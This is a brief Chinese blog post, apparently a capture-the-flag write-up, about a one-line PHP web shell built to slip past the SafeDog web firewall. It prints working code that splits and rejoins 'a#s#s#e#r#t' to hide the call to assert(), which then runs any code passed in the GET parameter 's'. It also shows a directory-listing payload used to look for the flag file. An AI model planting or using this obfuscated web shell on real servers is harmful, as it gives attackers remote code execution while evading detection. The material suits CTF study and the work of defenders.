仅供参考,共同进步。

过狗一句话

题目:

1 <?php 
2 $poc="a#s#s#e#r#t"; #assert
3 $poc_1=explode("#",$poc); #数组
4 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; #assert
5 $poc_2($_GET['s']) # assert($_GET['s'])
6 ?>

注:assert()函数内如果是字符串,函数将会把它当做PHP代码执行。

       explode()  函数使用一个字符串分割另一个字符串,字符串分割后组成一个数组返回

 

读取到的信息:

如果 ‘ s ’ 为字符串命令,将会被assert()函数执行,通过此段一句话木马可通过assert() 函数可执行任意命令 ‘ s ’

 

通过 ‘ s ’ 输出文件目录:

构造 s =>    s = print_r( scandir( ' ./ ' ) )

注: scandir() 函数 返回一个数组,数组包含指定路径中的文件和目录

        print_r()函数  以易于理解的格式打印变量

 

根据猜测测试:

 

 进一步猜测 flag 在 f14g.txt 中:

 

posted @ 2018-09-25 11:12  南山i  阅读(1058)  评论(0编辑  收藏  举报